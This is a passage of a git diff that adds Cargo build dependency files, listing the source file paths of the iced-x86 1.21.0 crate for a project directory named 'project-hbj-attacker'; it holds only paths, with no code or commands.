+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/instruction_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mem_op.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mnemonic_str_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_handler.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_kind_tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops_tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums_shared.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/options.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/pseudo_ops_fast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options_fast_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_consts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opt_provider.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils_all.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt_opts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/pseudo_ops.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl_ls.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/string_output.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/symres.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_constants.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_error.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_features.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/cpuid_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/factory.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/info_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/rflags_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_create.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_internal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_memory_sizes.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_op_counts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/memory_size.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonic.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonics.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/register.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/tuple_type_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/../README.md:
diff --git a/01/project-hbj-attacker/target/debug/deps/iced_x86-ce35e8322c266bad.d b/01/project-hbj-attacker/target/debug/deps/iced_x86-ce35e8322c266bad.d
new file mode 100644
index 0000000..3e3ace9
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/iced_x86-ce35e8322c266bad.d
@@ -0,0 +1,126 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/iced_x86-ce35e8322c266bad.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/block.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/call_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/ip_relmem_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jcc_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jmp_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_br_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/xbegin_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/constant_offsets.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/data_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/d3now.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/evex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/fpu.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/legacy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/vex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_evex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_legacy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_vex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_xop.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/evex_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/legacy_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/vex_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/encoder_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/handlers_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/instruction_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mem_op.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mnemonic_str_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_handler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_kind_tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops_tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums_shared.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/options.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/pseudo_ops_fast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/regs.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options_fast_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_consts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opt_provider.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils_all.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/regs.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/regs.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt_opts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/pseudo_ops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl_ls.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/string_output.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/symres.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_constants.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_features.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/cpuid_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/factory.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/info_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/rflags_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_create.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_memory_sizes.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_op_counts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/memory_size.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonic.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonics.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/register.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/tuple_type_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/../README.md
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libiced_x86-ce35e8322c266bad.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/block.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/call_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/ip_relmem_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jcc_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jmp_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_br_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/xbegin_instr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/constant_offsets.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/data_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/d3now.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/evex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/fpu.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/legacy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/vex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/mod.rs 